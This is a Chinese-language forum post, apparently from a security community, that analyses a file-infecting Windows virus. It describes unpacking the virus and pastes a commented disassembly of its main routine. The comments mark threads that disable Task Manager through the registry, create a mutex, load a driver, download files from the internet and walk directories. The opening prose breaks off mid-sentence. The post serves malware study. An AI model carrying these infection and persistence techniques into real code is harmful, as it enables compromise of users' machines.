这是我在网上找的一个病毒。
这是一个感染型病毒,可以看到被他感染的pe文件idata和.src节会变大
这个病毒感觉跟加壳一样,不过研究他行为,不是脱壳所以用esp定律,可以脱壳。不过要分析还是 老老实实跟踪一下,进去第一个call之后,经历各种循环之后,最后一个retn来到了解密之后的代码,可以看到这个代码在内存中,函数也是很猥琐的调用,终于进到真正的病毒内部了,然后又是创建一个线程,然后先建一个互斥体再创建一个线程,完后把控制权交给了宿主,接着刚创建的线程,开始干活了,又创建了好几个线程,这些线程
00A8EA33 55 push ebp
00A8EA34 8BEC mov ebp,esp
00A8EA36 B8 B0110100 mov eax,0x111B0
00A8EA3B E8 80480000 call 00A932C0
00A8EA40 57 push edi
00A8EA41 C785 54FEFFFF 0>mov dword ptr ss:[ebp-0x1AC],0x0
00A8EA4B 68 02800000 push 0x8002
00A8EA50 FF15 3401B000 call dword ptr ds:[0xB00134] ; kernel32.SetErrorMode
00A8EA56 8D85 70FEFFFF lea eax,dword ptr ss:[ebp-0x190]
00A8EA5C 50 push eax
00A8EA5D 6A 02 push 0x2
00A8EA5F FF15 C401B000 call dword ptr ds:[0xB001C4] ; ws2_32.WSAStartup
00A8EA65 68 3040A900 push 0xA94030
00A8EA6A FF15 3001B000 call dword ptr ds:[0xB00130] ; kernel32.InitializeCriticalSection
00A8EA70 68 1840A900 push 0xA94018
00A8EA75 FF15 3001B000 call dword ptr ds:[0xB00130] ; kernel32.InitializeCriticalSection
00A8EA7B 68 5040A900 push 0xA94050
00A8EA80 FF15 3001B000 call dword ptr ds:[0xB00130] ; kernel32.InitializeCriticalSection
00A8EA86 E8 63F9FFFF call 00A8E3EE ; 写注册表禁用任务管理器,互次
00A8EA8B 6A 00 push 0x0
00A8EA8D 6A 00 push 0x0
00A8EA8F 8D8D 54FEFFFF lea ecx,dword ptr ss:[ebp-0x1AC]
00A8EA95 51 push ecx
00A8EA96 6A 00 push 0x0
00A8EA98 6A 00 push 0x0
00A8EA9A 68 2AD2A800 push 0xA8D22A ;创建互次体
00A8EA9F 6A 00 push 0x0
00A8EAA1 6A 00 push 0x0
00A8EAA3 FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EAA9 50 push eax
00A8EAAA E8 3626FFFF call 00A810E5
00A8EAAF 83C4 0C add esp,0xC
00A8EAB2 6A 00 push 0x0
00A8EAB4 6A 00 push 0x0
00A8EAB6 8D95 54FEFFFF lea edx,dword ptr ss:[ebp-0x1AC]
00A8EABC 52 push edx
00A8EABD 6A 00 push 0x0
00A8EABF 6A 00 push 0x0
00A8EAC1 68 7C54A800 push 0xA8547C ; 加载驱动 C:\WINDOWS\system32\drivers\qhklpk.sys
00A8EAC6 6A 00 push 0x0
00A8EAC8 6A 00 push 0x0
00A8EACA FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EAD0 50 push eax
00A8EAD1 E8 0F26FFFF call 00A810E5
00A8EAD6 83C4 0C add esp,0xC
00A8EAD9 6A 00 push 0x0
00A8EADB 6A 00 push 0x0
00A8EADD 8D85 54FEFFFF lea eax,dword ptr ss:[ebp-0x1AC]
00A8EAE3 50 push eax
00A8EAE4 6A 00 push 0x0
00A8EAE6 6A 00 push 0x0
00A8EAE8 68 BEE1A800 push 0xA8E1BE ;网上下载文件Internetopenurl
00A8EAED 6A 00 push 0x0
00A8EAEF 6A 00 push 0x0
00A8EAF1 FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EAF7 50 push eax
00A8EAF8 E8 E825FFFF call 00A810E5
00A8EAFD 83C4 0C add esp,0xC
00A8EB00 6A 00 push 0x0
00A8EB02 6A 00 push 0x0
00A8EB04 8D8D 54FEFFFF lea ecx,dword ptr ss:[ebp-0x1AC]
00A8EB0A 51 push ecx
00A8EB0B 6A 00 push 0x0
00A8EB0D 6A 00 push 0x0
00A8EB0F 68 6C3FA800 push 0xA83F6C ;遍历文件目录
00A8EB14 6A 00 push 0x0
00A8EB16 6A 00 push 0x0
00A8EB18 FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EB1E 50 push eax
00A8EB1F E8 C125FFFF call 00A810E5
00A8EB24 83C4 0C add esp,0xC
00A8EB27 6A 00 push 0x0
00A8EB29 6A 00 push 0x0
00A8EB2B 8D95 54FEFFFF lea edx,dword ptr ss:[ebp-0x1AC]
00A8EB31 52 push edx
00A8EB32 6A 00 push 0x0
00A8EB34 6A 00 push 0x0
00A8EB36 68 4958A800 push 0xA85849 ;创建临时文件目录
00A8EB3B 6A 00 push 0x0
00A8EB3D 6A 00 push 0x0
00A8EB3F FF15 BC00B000 call dword ptr ds:[0xB000BC] ; kernel32.CreateThread
00A8EB45 50 push eax
00A8EB46 E8 9A25FFFF call 00A810E5
00A8EB4B 83C4 0C add esp,0xC
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
